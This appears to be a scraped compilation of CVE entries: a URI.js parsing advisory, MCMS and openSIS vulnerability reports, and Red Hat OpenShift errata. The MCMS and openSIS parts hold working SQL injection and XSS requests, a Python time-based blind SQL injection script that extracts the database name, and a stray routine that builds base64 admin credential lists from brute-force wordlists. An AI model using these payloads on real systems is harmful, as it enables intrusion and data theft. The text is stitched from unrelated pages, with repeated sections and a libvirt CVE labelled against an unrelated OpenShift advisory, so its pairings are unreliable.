URI.js is a Javascript URL mutation library. Before version 1.19.9, whitespace characters are not removed from the beginning of the protocol, so URLs are not parsed properly. This issue has been patched in version 1.19.9. Removing leading whitespace from values before passing them to URI.parse can be used as a workaround.

**Impact**

Whitespace characters are not removed from the beginning of the protocol, so URLs are not parsed properly and protocol validation mechanisms may fail.

**Patches**

Patched in 1.19.9

**Workarounds**

Remove leading whitespace from values before passing them to URI.parse (e.g. via .href(value) or new URI(value)), e.g. by using

function remove\_whitespace(url){
     const whitespace \= /^\[\\x00-\\x20\\u00a0\\u1680\\u2000-\\u200a\\u2028\\u2029\\u202f\\u205f\\u3000\\ufeff\]+/;
     url \= url.replace(whitespace, '')
     return url
}

**References**

*   https://huntr.dev/bounties/82ef23b8-7025-49c9-b5fc-1bb9885788e5/

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in medialize/URI.js

CVE-2022-24723: Leading white space bypasses protocol validation

**Impact**

Whitespace characters are not removed from the beginning of the protocol, so URLs are not parsed properly and protocol validation mechanisms may fail.

**Patches**

Patched in 1.19.9

**Workarounds**

Remove leading whitespace from values before passing them to URI.parse (e.g. via `.href(value)` or `new URI(value)`), e.g. by using

function remove\_whitespace(url){
     const whitespace \= /^\[\\x00-\\x20\\u00a0\\u1680\\u2000-\\u200a\\u2028\\u2029\\u202f\\u205f\\u3000\\ufeff\]+/;
     url \= url.replace(whitespace, '')
     return url
}

**References**

*   https://huntr.dev/bounties/82ef23b8-7025-49c9-b5fc-1bb9885788e5/

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in medialize/URI.js

CVE-2022-24723: Build software better, together

MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml.

A suspicious point was found in the `IContentDao.xml` file  
![image](https://user-images.githubusercontent.com/47287118/150347037-bc446f1c-5e97-4a41-897a-18c0370ff8db.png)

Since the `id` of `select` maps to a method in Java, and this XML corresponds to Content, we looked directly in `ComtentAction.java` and found a call to  
![image](https://user-images.githubusercontent.com/47287118/150347149-c7bfda03-8d93-41dd-b48f-dd9dd48f7ae7.png)

Next we try to inject, see the top class definition of `ComtentAction.java` of the file, we can know that the route is `host:port/cms/content`, and then Adding the method to be called, we can get the route as `host:port/cms/content/list`, and from the placeholder of `IContentDao.xml`, we can know that the suspicious injection point is `categoryId`, and then try to inject

    POST /cms/content/list HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: Phpstorm-f0bc0443=05da4cd3-973a-421b-afa6-a7c2e0ed2f79;
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 14
    
    contentType=1'
    

![image](https://user-images.githubusercontent.com/47287118/150347530-e9614dc7-310f-4617-b885-61d693d14602.png)

\---

As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run  
![image](https://user-images.githubusercontent.com/47287118/150347659-c81a26f9-e36a-4fd5-a0ba-a235c91c5c6b.png)  
![image](https://user-images.githubusercontent.com/47287118/150347692-8506abc0-92a5-4284-8792-6c20df64c65c.png)  
![image](https://user-images.githubusercontent.com/47287118/150347739-24e2f92e-8fe8-4bd5-a6cf-bc4ffbf2e54a.png)  
![image](https://user-images.githubusercontent.com/47287118/150347724-6031af97-bafd-4e97-936a-8810d2ad9e93.png)

CVE-2022-23898: MCMS5.2.5 SQLI · Issue #62 · ming-soft/MCMS

MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via search.do in the file /web/MCmsAction.java.

As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run  
![image](https://user-images.githubusercontent.com/47287118/150349256-f4d140be-c973-468c-9239-384309afd3a7.png)

Look up for `filed` and find the incoming parameter  
![image](https://user-images.githubusercontent.com/47287118/150349300-0c8c74b0-2734-469d-a0ce-ce9f032942e6.png)

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain  
![image](https://user-images.githubusercontent.com/47287118/150349351-25462576-50c7-45cd-ba3f-042780675506.png)  
![image](https://user-images.githubusercontent.com/47287118/150349378-395bca53-008d-4505-9431-5c4031426ecc.png)

**Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain  
![image](https://user-images.githubusercontent.com/47287118/150349446-eaa05c3e-09c3-4e7d-9722-329385cba00b.png)  
![image](https://user-images.githubusercontent.com/47287118/150349472-93194e44-127d-4934-88bd-4bdb6b856e6c.png)**

This block was found to have database calls  
![image](https://user-images.githubusercontent.com/47287118/150349523-43f20a16-e97a-46ff-b03e-a8ced1609962.png)

Next we try to inject, see the file `net/mingsoft/cms/action/web/MCmsAction.java` at the top of the class definition, you can know the route is `host:port/mcms`, and then add the method to be called, you can get the route is `host:port/mcms/ search.do`, next try to inject

    GET /mcms/search.do?1'=0000 HTTP/1.1
    User-Agent: PostmanRuntime/7.29.0
    Accept: */*
    Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
    Host: localhost:8080
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4
    
    
    

![image](https://user-images.githubusercontent.com/47287118/150349694-eb30229e-4606-407d-a3dd-d5a196be76c0.png)

Next I wrote a py file for convenient validation, using delayed injection

    """
    {0}：要查的东西
    {1}：起始位置
    {2}：长度
    {3}：猜测的值
    """
    host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"
    
    def a():
        with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
            with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
                with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
                    data1 = usernames.read().splitlines()
                    data2 = pwds.read().splitlines()
                    for username in data1:
                        for pwd in data2:
                            str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))
    
                            # str += "\n"
                            file.write(str.decode("utf-8"))
    
    def timeout(url):
        try:
            rsp = requests.get(url, timeout=3)
            return rsp.text
        except Exception:
            return "timeout"
    
    
    def guess_length(target):
        for i in range(1, 100):
            url = host.format(target,1,1,i)
            rsp = timeout(url)
            if "timeout" in rsp:
                print("库长：" + chr(i) )
                return int(chr(i))
    
    def guess_char(tar,len):
        for i in range(0,len+1):
            for j in range(47, 123):
                url = host.format(tar,i,1,"'{0}'".format(j))
                rsp = timeout(url)
                if "timeout" in rsp:
                    print(chr(j))
    
    def b(tar):
        length = guess_length(tar)
        guess_char("database()",length)
    
    b("length(database())")

CVE-2022-23899: MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI · Issue #63 · ming-soft/MCMS

MCMS v5.2.4 was discovered to contain a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp.

Java

1

https://gitee.com/mingSoft/MCMS.git

git@gitee.com:mingSoft/MCMS.git

mingSoft

MCMS

MCMS

CVE-2022-25125: MCMS存在SQL注入【前台】 · Issue #I4TGYI · 铭飞/MCMS - Gitee.com

OS4ED openSIS 8.0 is affected by cross-site scripting (XSS) in EmailCheckOthers.php. An attacker can inject JavaScript code to get the user's cookie and take over the working session of user.

**Description**

By injecting Javascript code, an attacker can steal the user's cookie and take over the user's account. This happened because of the lack of security implementation for`type` parameter. This was tested on demo website

**Exploitation**

![Screenshot from 2021-09-05 14-06-22](https://user-images.githubusercontent.com/35491855/132122706-da7fec3a-2b7b-433b-b059-a25f7cf604ae.jpg)

**Injection point:**  
`HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf`  
**Request:**

GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

**Response:**

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 09:57:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

**Solution:**

Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using `htmlentities()` function to encode the user's input before printing it out to the user's screen

CVE-2021-40637: Reflected XSS in EmailCheckOthers.php · Issue #199 · OS4ED/openSIS-Classic

OS4ED openSIS 8.0 is affected by SQL Injection in CheckDuplicateName.php, which can extract information from the database.

**Description**

Due to lack of protection, parameters `table_name`, `field_name`, `id`, `field_id` can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter `msg` can be used to inject XSS payload and steal user's cookie (and even takeover user's account)  
![Screenshot from 2021-09-05 14-45-56(1)](https://user-images.githubusercontent.com/35491855/132119553-61eec465-0e9f-4276-bd86-aa278de2338d.jpg)

As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities.

**Exploiting**

![Screenshot from 2021-09-05 14-51-24](https://user-images.githubusercontent.com/35491855/132120089-1ba16847-7260-4872-ad53-c8d6c7c39901.jpg)

**Injection point**:  
`HTTP://demo/CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg=`

In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in `field_name`, `msg`.

**Request:**

GET /CheckDuplicateName.php?table\_name=api\_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field\_name=&val=&field\_id=&msg= HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

**Response:**

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:59:18 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 716
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlx

**Solution**

Add security functions such as `sqlSecurityFilter` to sanitize parameters before processing or printing out to the screen. For XSS, use `htmlentities` to properly encode the output.

CVE-2021-40636: XSS and Error based SQL injection in CheckDuplicateName.php · Issue #198 · OS4ED/openSIS-Classic

A stored cross-site scripting (XSS) vulnerability in the admin interface in Element-IT HTTP Commander 7.0.0 allows unauthenticated users to get admin access by injecting a malicious script in the User-Agent field.

CVE-2022-24573: Element-IT software products news

A flaw was found in libvirt while it generates SELinux MCS category pairs for VMs' dynamic labels. This flaw allows one exploited guest to access files labeled for another guest, resulting in the breaking out of sVirt confinement. The highest threat from this vulnerability is to confidentiality and integrity.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2021-09-27

Updated:

2021-09-27

**RHSA-2021:3631 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: OpenShift Container Platform 4.8.13 security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

Red Hat OpenShift Container Platform release 4.8.13 is now available with  
updates to packages and images that fix several bugs and add enhancements.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.  

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.8.13. See the following advisory for the container images for  
this release:  

https://access.redhat.com/errata/RHSA-2021:3632

Security Fix(es):  

*   kubernetes: Symlink exchange can allow host filesystem access (CVE-2021-25741)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

All OpenShift Container Platform 4.8 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.8/updating/updating-cluster

*   between-minor.html#understanding-upgrade-channels\_updating-cluster-between
*   minor

**Affected Products**

*   Red Hat OpenShift Container Platform 4.8 for RHEL 8 x86\_64
*   Red Hat OpenShift Container Platform 4.8 for RHEL 7 x86\_64
*   Red Hat OpenShift Container Platform for Power 4.8 for RHEL 8 ppc64le
*   Red Hat OpenShift Container Platform for IBM Z and LinuxONE 4.8 for RHEL 8 s390x

**Fixes**

*   BZ - 1993749 - CVE-2021-25741 kubernetes: Symlink exchange can allow host filesystem access

**Red Hat OpenShift Container Platform 4.8 for RHEL 8**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.src.rpm

SHA-256: 58ca67d7a65ad27329783c2177ee83813a0d148c240a0500c100ac6c295a1eb7

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.src.rpm

SHA-256: 02361efdcf9981313c8249eadb1a8becc4ab32802e7eb232b4fb55e7a10ca0de

python-sushy-3.7.3-0.20210804111215.b76050c.el8.src.rpm

SHA-256: 888f926afed577eb1721902db15af68d8c40da62ee94d9c715a9f6df090c91dd

x86\_64

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.x86\_64.rpm

SHA-256: 2b1ca029a653febf2cc6ccb622ce25c7b3ff3315d621562c3571fc9fe228c9d0

openshift-clients-redistributable-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.x86\_64.rpm

SHA-256: db6ab831bb217c94f93584f3163ab5751848070d41ac7725f512de65200748db

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.x86\_64.rpm

SHA-256: 79d4862e71dac256791386465c4554a5e11841900d3c2d0eac4905d6d177f9ce

python3-sushy-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 8c3e080538698ce9318ba5fa75910b27cbf4ee93a7ba40944900b4231e4fe64a

python3-sushy-tests-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 1405d858f7c1a6745598c274a6dfd8bf6bc5f3d9fd741f27f430b9663281bad8

**Red Hat OpenShift Container Platform 4.8 for RHEL 7**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el7.src.rpm

SHA-256: 5aa10842816cd581c9b6a4e4b5e595fc3abf00fd8011935302deeb2b52e358d3

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el7.src.rpm

SHA-256: f18dec524f3fb42391313a200c7b95691eff8eb5b22f95b901b98d626c763a3a

x86\_64

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el7.x86\_64.rpm

SHA-256: 13a73b69db20594780b52e7ef5895c163d214fe2c068edb591a6a4e06e290ce0

openshift-clients-redistributable-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el7.x86\_64.rpm

SHA-256: ce176b32325035bb947dd76b71ad35b0d2ede14750385d6eb71aee11c0db8936

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el7.x86\_64.rpm

SHA-256: da552537034c749159074b1544312fd016dda766b76690d2c924677342e594bb

**Red Hat OpenShift Container Platform for Power 4.8 for RHEL 8**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.src.rpm

SHA-256: 58ca67d7a65ad27329783c2177ee83813a0d148c240a0500c100ac6c295a1eb7

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.src.rpm

SHA-256: 02361efdcf9981313c8249eadb1a8becc4ab32802e7eb232b4fb55e7a10ca0de

python-sushy-3.7.3-0.20210804111215.b76050c.el8.src.rpm

SHA-256: 888f926afed577eb1721902db15af68d8c40da62ee94d9c715a9f6df090c91dd

ppc64le

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.ppc64le.rpm

SHA-256: bf4a48797377bac9e9b3b741e9c6ab943df9dbe4a6ab6eb0df0e02436316e133

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.ppc64le.rpm

SHA-256: de7d99ace3528daa4d0c8a83a52b486c5a4fcd836ee2fb24d3a57e27cbedea16

python3-sushy-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 8c3e080538698ce9318ba5fa75910b27cbf4ee93a7ba40944900b4231e4fe64a

python3-sushy-tests-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 1405d858f7c1a6745598c274a6dfd8bf6bc5f3d9fd741f27f430b9663281bad8

**Red Hat OpenShift Container Platform for IBM Z and LinuxONE 4.8 for RHEL 8**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.src.rpm

SHA-256: 58ca67d7a65ad27329783c2177ee83813a0d148c240a0500c100ac6c295a1eb7

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.src.rpm

SHA-256: 02361efdcf9981313c8249eadb1a8becc4ab32802e7eb232b4fb55e7a10ca0de

python-sushy-3.7.3-0.20210804111215.b76050c.el8.src.rpm

SHA-256: 888f926afed577eb1721902db15af68d8c40da62ee94d9c715a9f6df090c91dd

s390x

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.s390x.rpm

SHA-256: 07280c5ec09790cac5f8dabd44e01f9564f7aeb42741d4d431bc675164112762

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.s390x.rpm

SHA-256: 75e867774dc160db17d642f943436c0d89922eb72ccd12366b820f7a05176555

python3-sushy-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 8c3e080538698ce9318ba5fa75910b27cbf4ee93a7ba40944900b4231e4fe64a

python3-sushy-tests-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 1405d858f7c1a6745598c274a6dfd8bf6bc5f3d9fd741f27f430b9663281bad8

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2021-3631: Red Hat Customer Portal - Access to 24x7 support and knowledge

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

![Red Hat Customer Portal](https://access.redhat.com/chrome_themes/nimbus/img/red-hat-customer-portal.svg)

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus
*   Red Hat CodeReady Studio

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2021-09-27

Updated:

2021-09-27

**RHSA-2021:3631 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: OpenShift Container Platform 4.8.13 security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

Red Hat OpenShift Container Platform release 4.8.13 is now available with  
updates to packages and images that fix several bugs and add enhancements.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.  

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.8.13. See the following advisory for the container images for  
this release:  

https://access.redhat.com/errata/RHSA-2021:3632

Security Fix(es):  

*   kubernetes: Symlink exchange can allow host filesystem access (CVE-2021-25741)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

All OpenShift Container Platform 4.8 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.8/updating/updating-cluster

*   between-minor.html#understanding-upgrade-channels\_updating-cluster-between
*   minor

**Affected Products**

*   Red Hat OpenShift Container Platform 4.8 for RHEL 8 x86\_64
*   Red Hat OpenShift Container Platform 4.8 for RHEL 7 x86\_64
*   Red Hat OpenShift Container Platform for Power 4.8 for RHEL 8 ppc64le
*   Red Hat OpenShift Container Platform for IBM Z and LinuxONE 4.8 for RHEL 8 s390x

**Fixes**

*   BZ - 1993749 - CVE-2021-25741 kubernetes: Symlink exchange can allow host filesystem access

**Red Hat OpenShift Container Platform 4.8 for RHEL 8**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.src.rpm

SHA-256: 58ca67d7a65ad27329783c2177ee83813a0d148c240a0500c100ac6c295a1eb7

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.src.rpm

SHA-256: 02361efdcf9981313c8249eadb1a8becc4ab32802e7eb232b4fb55e7a10ca0de

python-sushy-3.7.3-0.20210804111215.b76050c.el8.src.rpm

SHA-256: 888f926afed577eb1721902db15af68d8c40da62ee94d9c715a9f6df090c91dd

x86\_64

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.x86\_64.rpm

SHA-256: 2b1ca029a653febf2cc6ccb622ce25c7b3ff3315d621562c3571fc9fe228c9d0

openshift-clients-redistributable-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.x86\_64.rpm

SHA-256: db6ab831bb217c94f93584f3163ab5751848070d41ac7725f512de65200748db

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.x86\_64.rpm

SHA-256: 79d4862e71dac256791386465c4554a5e11841900d3c2d0eac4905d6d177f9ce

python3-sushy-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 8c3e080538698ce9318ba5fa75910b27cbf4ee93a7ba40944900b4231e4fe64a

python3-sushy-tests-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 1405d858f7c1a6745598c274a6dfd8bf6bc5f3d9fd741f27f430b9663281bad8

**Red Hat OpenShift Container Platform 4.8 for RHEL 7**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el7.src.rpm

SHA-256: 5aa10842816cd581c9b6a4e4b5e595fc3abf00fd8011935302deeb2b52e358d3

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el7.src.rpm

SHA-256: f18dec524f3fb42391313a200c7b95691eff8eb5b22f95b901b98d626c763a3a

x86\_64

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el7.x86\_64.rpm

SHA-256: 13a73b69db20594780b52e7ef5895c163d214fe2c068edb591a6a4e06e290ce0

openshift-clients-redistributable-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el7.x86\_64.rpm

SHA-256: ce176b32325035bb947dd76b71ad35b0d2ede14750385d6eb71aee11c0db8936

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el7.x86\_64.rpm

SHA-256: da552537034c749159074b1544312fd016dda766b76690d2c924677342e594bb

**Red Hat OpenShift Container Platform for Power 4.8 for RHEL 8**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.src.rpm

SHA-256: 58ca67d7a65ad27329783c2177ee83813a0d148c240a0500c100ac6c295a1eb7

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.src.rpm

SHA-256: 02361efdcf9981313c8249eadb1a8becc4ab32802e7eb232b4fb55e7a10ca0de

python-sushy-3.7.3-0.20210804111215.b76050c.el8.src.rpm

SHA-256: 888f926afed577eb1721902db15af68d8c40da62ee94d9c715a9f6df090c91dd

ppc64le

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.ppc64le.rpm

SHA-256: bf4a48797377bac9e9b3b741e9c6ab943df9dbe4a6ab6eb0df0e02436316e133

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.ppc64le.rpm

SHA-256: de7d99ace3528daa4d0c8a83a52b486c5a4fcd836ee2fb24d3a57e27cbedea16

python3-sushy-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 8c3e080538698ce9318ba5fa75910b27cbf4ee93a7ba40944900b4231e4fe64a

python3-sushy-tests-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 1405d858f7c1a6745598c274a6dfd8bf6bc5f3d9fd741f27f430b9663281bad8

**Red Hat OpenShift Container Platform for IBM Z and LinuxONE 4.8 for RHEL 8**

SRPM

openshift-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.src.rpm

SHA-256: 58ca67d7a65ad27329783c2177ee83813a0d148c240a0500c100ac6c295a1eb7

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.src.rpm

SHA-256: 02361efdcf9981313c8249eadb1a8becc4ab32802e7eb232b4fb55e7a10ca0de

python-sushy-3.7.3-0.20210804111215.b76050c.el8.src.rpm

SHA-256: 888f926afed577eb1721902db15af68d8c40da62ee94d9c715a9f6df090c91dd

s390x

openshift-clients-4.8.0-202109201328.p0.git.88e7eba.assembly.stream.el8.s390x.rpm

SHA-256: 07280c5ec09790cac5f8dabd44e01f9564f7aeb42741d4d431bc675164112762

openshift-hyperkube-4.8.0-202109180335.p0.git.a620f50.assembly.stream.el8.s390x.rpm

SHA-256: 75e867774dc160db17d642f943436c0d89922eb72ccd12366b820f7a05176555

python3-sushy-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 8c3e080538698ce9318ba5fa75910b27cbf4ee93a7ba40944900b4231e4fe64a

python3-sushy-tests-3.7.3-0.20210804111215.b76050c.el8.noarch.rpm

SHA-256: 1405d858f7c1a6745598c274a6dfd8bf6bc5f3d9fd741f27f430b9663281bad8

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#java